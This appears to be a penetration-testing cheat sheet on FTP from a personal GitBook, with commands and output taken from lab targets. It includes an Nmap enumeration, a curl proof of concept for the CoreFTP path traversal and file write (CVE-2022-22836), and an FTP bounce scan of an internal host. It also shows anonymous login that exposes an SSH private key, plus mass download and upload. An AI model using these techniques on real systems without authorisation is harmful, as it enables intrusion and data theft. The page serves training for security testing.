# FTP (21) [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) ## Nmap ```shell-session sudo nmap -sV -p21 -sC -A 10.129.14.136 ``` ## **All scripts** ```shell-session $ find / -type f -name ftp* 2>/dev/null | grep scripts /usr/share/nmap/scripts/ftp-syst.nse /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse /usr/share/nmap/scripts/ftp-vuln-cve2010-4221.nse /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse /usr/share/nmap/scripts/ftp-bounce.nse /usr/share/nmap/scripts/ftp-libopie.nse /usr/share/nmap/scripts/ftp-anon.nse /usr/share/nmap/scripts/ftp-brute.nse ``` ## Exploit ### CoreFTP before build 727 - CVE-2022-22836: `authenticated directory`/`path traversal,` and `arbitrary file write` vulnerability ```shell-session curl -k -X PUT -H "Host: " --basic -u : --data-binary "PoC." --path-as-is https:///../../../../../../whoops ``` ### CrushFTP - CVE-2024-4040 {% embed url="" %} ### Wing FTP RCE - CVE-2025-47812 {% content-ref url="../public-exploit/wing-ftp" %} [wing-ftp](https://0xss0rz.gitbook.io/0xss0rz/pentest/public-exploit/wing-ftp) {% endcontent-ref %} ### CVE-2024-46483 - Pre-Authentication Heap Overflow in Xlight SFTP server Xlight 32 and 64-bit versions <= 3.9.4.2 {% embed url="" %} ## FTP Bounce attack Consider we are targetting an FTP Server `FTP_DMZ` exposed to the internet. Another device within the same network, `Internal_DMZ`, is not exposed to the internet. We can use the connection to the `FTP_DMZ` server to scan `Internal_DMZ` using the FTP Bounce attack and obtain information about the server's open ports. Then, we can use that information as part of our attack against the infrastructure. The `Nmap` -b flag can be used to perform an FTP bounce attack: ```shell-session $ nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 04:55 EDT Resolved FTP bounce attack proxy to 10.10.110.213 (10.10.110.213). Attempting connection to ftp://anonymous:password@10.10.110.213:21 Connected:220 (vsFTPd 3.0.3) Login credentials accepted by FTP server! Initiating Bounce Scan at 04:55 FTP command misalignment detected ... correcting. Completed Bounce Scan at 04:55, 0.54s elapsed (1 total ports) Nmap scan report for 172.17.0.2 Host is up. PORT STATE SERVICE 80/tcp open http ``` ## Connect to SFTP ```shell-session $ openssl s_client -connect 10.129.14.136:21 -starttls ftp ``` ``` lftp lftp :~> set ftp:ssl-force true lftp :~> set ssl:verify-certificate no lftp :~> connect 10.10.10.208 lftp 10.10.10.208:~> login Usage: login [] lftp 10.10.10.208:~> login username Password ``` ## Theory A distinction is made between `active` and `passive` FTP. In the active variant, the client establishes the connection as described via TCP port 21 and thus informs the server via which client-side port the server can transmit its responses. However, if a firewall protects the client, the server cannot reply because all external connections are blocked. For this purpose, the `passive mode` has been developed. Here, the server announces a port through which the client can establish the data channel. Since the client initiates the connection in this method, the firewall does not block the transfer. ## Commands Commands: {% embed url="" %} | **bye** | [Exits](https://www.computerhope.com/jargon/e/exit.htm) from FTP. | | -------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | **cd** | Changes [directory](https://www.computerhope.com/jargon/d/director.htm). | | **close** | Exits from FTP. | | **delete** | [Deletes](https://www.computerhope.com/jargon/d/delete.htm) a file. | | **dir** |

Lists files if connected.

dir -C lists the files in wide format.
dir -1 lists the files in bare format in alphabetic order
dir -r lists directory in reverse alphabetic order.
dir -R lists all files in current directory and subdirectories.
dir -S lists files in bare format in alphabetic order.

| | **disconnect** | Exits from FTP. | | **get** | Grabs file from the connected computer. | | **put** | Send one file. | | **pwd** | Print [working directory](https://www.computerhope.com/jargon/c/currentd.htm). | ## Configuration ```shell-session cat /etc/vsftpd.conf | grep -v "#" ``` | **Setting** | **Description** | | ------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------- | | `listen=NO` | Run from inetd or as a standalone daemon? | | `listen_ipv6=YES` | Listen on IPv6 ? | | `anonymous_enable=NO` | Enable Anonymous access? | | `local_enable=YES` | Allow local users to login? | | `dirmessage_enable=YES` | Display active directory messages when users go into certain directories? | | `use_localtime=YES` | Use local time? | | `xferlog_enable=YES` | Activate logging of uploads/downloads? | | `connect_from_port_20=YES` | Connect from port 20? | | `secure_chroot_dir=/var/run/vsftpd/empty` | Name of an empty directory | | `pam_service_name=vsftpd` | This string is the name of the PAM service vsftpd will use. | | `rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem` | The last three options specify the location of the RSA certificate to use for SSL encrypted connections. | | `rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key` | | | `ssl_enable=NO` | | `/etc/ftpusers` : this file is used to deny certain users access to the FTP service ```shell-session cat /etc/ftpusers guest john kevin ``` ## Anonymous | **Setting** | **Description** | | ------------------------------ | ---------------------------------------------------------------------------------- | | `anonymous_enable=YES` | Allowing anonymous login? | | `anon_upload_enable=YES` | Allowing anonymous to upload files? | | `anon_mkdir_write_enable=YES` | Allowing anonymous to create new directories? | | `no_anon_password=YES` | Do not ask anonymous for password? | | `anon_root=/home/username/ftp` | Directory for anonymous. | | `write_enable=YES` | Allow the usage of FTP commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE? | ``` $ ftp 10.129.14.136 Connected to 10.129.14.136. 220 "Welcome to the HTB Academy vsFTP service." Name (10.129.14.136:cry0l1t3): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-rw-r-- 1 1002 1002 8138592 Sep 14 16:54 Calender.pptx drwxrwxr-x 2 1002 1002 4096 Sep 14 16:50 Clients drwxrwxr-x 2 1002 1002 4096 Sep 14 16:50 Documents drwxrwxr-x 2 1002 1002 4096 Sep 14 16:50 Employees -rw-rw-r-- 1 1002 1002 41 Sep 14 16:45 Important Notes.txt 226 Directory send OK. ``` ## List hidden files ``` ftp> ls -la 229 Entering Extended Passive Mode (|||44048|) 150 Opening ASCII mode data connection for file list drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 . drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .. -rw------- 1 ceil ceil 294 Nov 10 2021 .bash_history -rw-r--r-- 1 ceil ceil 220 Nov 10 2021 .bash_logout -rw-r--r-- 1 ceil ceil 3771 Nov 10 2021 .bashrc drwx------ 2 ceil ceil 4096 Nov 10 2021 .cache -rw-r--r-- 1 ceil ceil 807 Nov 10 2021 .profile drwx------ 2 ceil ceil 4096 Nov 10 2021 .ssh -rw------- 1 ceil ceil 759 Nov 10 2021 .viminfo 226 Transfer complete ftp> cd .ssh 250 CWD command successful ftp> ls -la 229 Entering Extended Passive Mode (|||46129|) 150 Opening ASCII mode data connection for file list drwx------ 2 ceil ceil 4096 Nov 10 2021 . drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .. -rw-rw-r-- 1 ceil ceil 738 Nov 10 2021 authorized_keys -rw------- 1 ceil ceil 3381 Nov 10 2021 id_rsa -rw-r--r-- 1 ceil ceil 738 Nov 10 2021 id_rsa.pub 226 Transfer complete ftp> ``` ## **Recursive Listing** ```shell-session ftp> ls -R ---> PORT 10,10,14,4,222,149 200 PORT command successful. Consider using PASV. ---> LIST -R 150 Here comes the directory listing. .: -rw-rw-r-- 1 ftp ftp 8138592 Sep 14 16:54 Calender.pptx drwxrwxr-x 2 ftp ftp 4096 Sep 14 17:03 Clients drwxrwxr-x 2 ftp ftp 4096 Sep 14 16:50 Documents drwxrwxr-x 2 ftp ftp 4096 Sep 14 16:50 Employees -rw-rw-r-- 1 ftp ftp 41 Sep 14 16:45 Important Notes.txt -rw------- 1 ftp ftp 0 Sep 15 14:57 testupload.txt ./Clients: drwx------ 2 ftp ftp 4096 Sep 16 18:04 HackTheBox drwxrwxrwx 2 ftp ftp 4096 Sep 16 18:00 Inlanefreight ./Clients/HackTheBox: -rw-r--r-- 1 ftp ftp 34872 Sep 16 18:04 appointments.xlsx -rw-r--r-- 1 ftp ftp 498123 Sep 16 18:04 contract.docx -rw-r--r-- 1 ftp ftp 478237 Sep 16 18:04 contract.pdf -rw-r--r-- 1 ftp ftp 348 Sep 16 18:04 meetings.txt ./Clients/Inlanefreight: -rw-r--r-- 1 ftp ftp 14211 Sep 16 18:00 appointments.xlsx -rw-r--r-- 1 ftp ftp 37882 Sep 16 17:58 contract.docx -rw-r--r-- 1 ftp ftp 89 Sep 16 17:58 meetings.txt -rw-r--r-- 1 ftp ftp 483293 Sep 16 17:59 proposal.pptx ./Documents: -rw-r--r-- 1 ftp ftp 23211 Sep 16 18:05 appointments-template.xlsx -rw-r--r-- 1 ftp ftp 32521 Sep 16 18:05 contract-template.docx -rw-r--r-- 1 ftp ftp 453312 Sep 16 18:05 contract-template.pdf ./Employees: 226 Directory send OK. ``` ## **Download a File** ```shell-session ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rwxrwxrwx 1 ftp ftp 0 Sep 16 17:24 Calendar.pptx drwxrwxrwx 4 ftp ftp 4096 Sep 16 17:57 Clients drwxrwxrwx 2 ftp ftp 4096 Sep 16 18:05 Documents drwxrwxrwx 2 ftp ftp 4096 Sep 16 17:24 Employees -rwxrwxrwx 1 ftp ftp 41 Sep 18 15:58 Important Notes.txt 226 Directory send OK. ftp> get Important\ Notes.txt local: Important Notes.txt remote: Important Notes.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for Important Notes.txt (41 bytes). 226 Transfer complete. 41 bytes received in 0.00 secs (606.6525 kB/s) ftp> exit 221 Goodbye. ``` ### Netexec ``` nxc ftp 192.168.0.10 -u 'marshall' -p 'badpassword' --ls netexec ftp [IP_ADDRESS] -u [USERNAME] -p [PASSWORD] --ls [DIRECTORY] netexec ftp [IP_ADDRESS] -u [USERNAME] -p [PASSWORD] --get [FILE] ``` ## **Download All Available Files** ```shell-session 0xss0rz@htb[/htb]$ wget -m --no-passive ftp://anonymous:anonymous@10.129.14.136 --2021-09-19 14:45:58-- ftp://anonymous:*password*@10.129.14.136/ => ‘10.129.14.136/.listing’ Connecting to 10.129.14.136:21... connected. Logging in as anonymous ... Logged in! ==> SYST ... done. ==> PWD ... done. ==> TYPE I ... done. ==> CWD not needed. ==> PORT ... done. ==> LIST ... done. 12.12.1.136/.listing [ <=> ] 466 --.-KB/s in 0s 2021-09-19 14:45:58 (65,8 MB/s) - ‘10.129.14.136/.listing’ saved [466] --2021-09-19 14:45:58-- ftp://anonymous:*password*@10.129.14.136/Calendar.pptx => ‘10.129.14.136/Calendar.pptx’ ==> CWD not required. ==> SIZE Calendar.pptx ... done. ==> PORT ... done. ==> RETR Calendar.pptx ... done. ...SNIP... 2021-09-19 14:45:58 (48,3 MB/s) - ‘10.129.14.136/Employees/.listing’ saved [119] FINISHED --2021-09-19 14:45:58-- Total wall clock time: 0,03s Downloaded: 15 files, 1,7K in 0,001s (3,02 MB/s) ``` ## **Upload a File** ```shell-session ftp> put testupload.txt local: testupload.txt remote: testupload.txt ---> PORT 10,10,14,4,184,33 200 PORT command successful. Consider using PASV. ---> STOR testupload.txt 150 Ok to send data. 226 Transfer complete. ``` ### Netexec ``` netexec ftp [IP_ADDRESS] -u [USERNAME] -p [PASSWORD] --put [LOCAL_FILE] [REMOTE_FILE] ``` ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)
## Interesting Books {% content-ref url="../../interesting-books" %} [interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books) {% endcontent-ref %} {% hint style="info" %} **Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you. {% endhint %} * [**Nmap Network Scanning**](https://www.amazon.fr/dp/0979958717?tag=0xss0rz-21)\ The official guide to the Nmap Security Scanner, a free and open source utility used by millions of people for network discovery, administration, and security auditing. From explaining port scanning basics for novices to detailing low-level packet crafting methods used by advanced hackers, this book by Nmap's original author suits all levels of security and networking professionals. * [**The Art of Network Penetration Testing**](https://www.amazon.fr/dp/1617296821)\ A guide to simulating an internal security breach. You’ll take on the role of the attacker and work through every stage of a professional pentest, from information gathering to seizing control of a system and owning the network. * [**Network Basics for Hackers**](https://www.amazon.fr/dp/B0BS3GZ1R9)\ The book offers one of the most complete and in-depth analyses of Wi-Fi and Bluetooth networks, then progresses through the various protocols such as DNS, ARP, SMTP, and others. ## Support this Gitbook I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it. [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) [![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)